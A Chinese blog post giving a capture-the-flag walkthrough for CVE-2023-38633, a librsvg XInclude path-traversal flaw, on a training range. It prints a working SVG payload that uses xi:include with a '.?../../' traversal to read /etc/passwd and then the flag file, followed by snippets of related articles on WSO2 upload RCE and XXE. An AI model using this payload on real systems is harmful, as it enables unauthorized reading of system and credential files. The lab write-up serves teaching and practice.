首页 > 其他分享 >CVE-2023-38633~XXE注入【春秋云境靶场渗透】

CVE-2023-38633~XXE注入【春秋云境靶场渗透】

时间:2024-08-11 15:25:52浏览次数:9  
标签:.. passwd flag 38633 etc 云境 XXE CVE

在这里插入图片描述

今天我们来攻克春秋云境CTF的CVE-2023-38633

image-20240808205359006

# 我们通过抓包来构造POC来查找/etc/passwd
<?xml version="1.0" encoding="UTF-8" standalone="no"?>  
<svg width="1000" height="1000" xmlns:xi="http://www.w3.org/2001/XInclude">  
   <rect width="600" height="600" style="fill:rgb(255,255,255);" />  
   <text x="10" y="100">  
     <xi:include href=".?../../../../../../../../etc/passwd" parse="text"   
encoding="UTF-8">  
       <xi:fallback>file not found</xi:fallback>  
     </xi:include>  
   </text>  
</svg>

image-20240808205804465

这样我们就看到了/etc/passwd文件里面的内容

# 既然可以看到/etc/passwd的内容,那我们就可以查看flag
.?../../../../../../../../flag

image-20240808210054438

好小子,离成功又近一步!!!

标签:..,passwd,flag,38633,etc,云境,XXE,CVE
From: https://blog.csdn.net/weixin_67832625/article/details/141091495

相关文章

  • 春秋云境 | 文件上传 | CVE-2022-29464
    靶标介绍WSO2文件上传漏洞(CVE-2022-29464)是OrangeTsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。开启靶场先到国家信息安全漏洞库查看一下这个漏洞的相关信息利用......
  • vulhubXXE靶机
    将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254kali本机ip根据对比可知XXE的一个ip地址为192.168.134.134,并开放了80端口在浏览器访问http://192.168.134.134对网站进行目录和......
  • xxe学习笔记
    什么是xxeXXE(XMLExternalEntityInjection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。当允许引用外部实体时,通过构造恶......
  • XXE
    XXEXXE全称为XMLEnternalEntityInjection,中文名称:XML外部实体注入XXE漏洞DTD引用外部实体时导致的漏洞解析时未对XML外部实体加以限制,攻击者可以将恶意代码注入到XML中,导致服务器加载恶意的外部实体引发文件读取,SSRF,命令执行等特征:在HTTP的Request报文出现一下请求报文,即......
  • [CSAWQual 2019]Web_Unagi XXE漏洞练习题
    题目地址:BUUCTF在线评测这道题就是简单的xxe漏洞的注入。进来之后我们进行一个信息收集,在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。<?xmlversion='1.0'?><!DOCTYPEusers[<!ENT......
  • 生产实习--启明星辰 第四天(Web网络安全基础知识,sql注入,xss攻击,csrf与ssrf,xxe攻击,未授
    web安全的基础知识基本定义Web安全,也称为网络安全或在线安全,是指保护网站、网页和Web服务免受各种威胁和攻击的技术和实践。这些威胁可能来自恶意软件、网络攻击、数据泄露、身份盗窃、服务中断等。Web安全的目标是确保Web应用程序和用户数据的安全、完整和可用性。一般流程......
  • 6.2 XXE和XML利用
    pikaqu靶场xml数据传输测试-有回显,玩法,协议,引入1、构造payload写文件<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEnote[<!ENTITYwrite"goodboy,thisisatest">]><note>&write;</note>读文件&......
  • XXE漏洞(Pikachu)
    原理要补好多知识~XXE漏洞全称XMLExternalEntityInjection即XML外部实体注入。XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。XXE漏洞触发的点往......
  • 用友U8 Cloud smartweb2.RPC.d 存在XXE漏洞
    用友U8Cloud漏洞复现1.Cloudsmartweb2.RPC.d存在XXE漏洞漏洞描述用友U8Cloudsmartweb2.RPC.d存在xml外部实体注入漏洞,攻击者可以通过此漏洞读取系统文件,获取敏感信息等。fofa语句:app="用友-U8-Cloud"漏洞:POST/hrss/dorado/smartweb2.RPC.d?__rpc=trueHTTP/1.1Ho......
  • xxe-基于Pikachu的学习
    XXE漏洞XML外部实体注入(XXE)的原理和应用_xml注入原理-CSDN博客XXE(XML外部实体注入)漏洞分析——pikachu靶场复现_pikachuxxe-CSDN博客原理XML外部实体注入漏洞(XMLExternalEntityInjection)简称XXE,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意......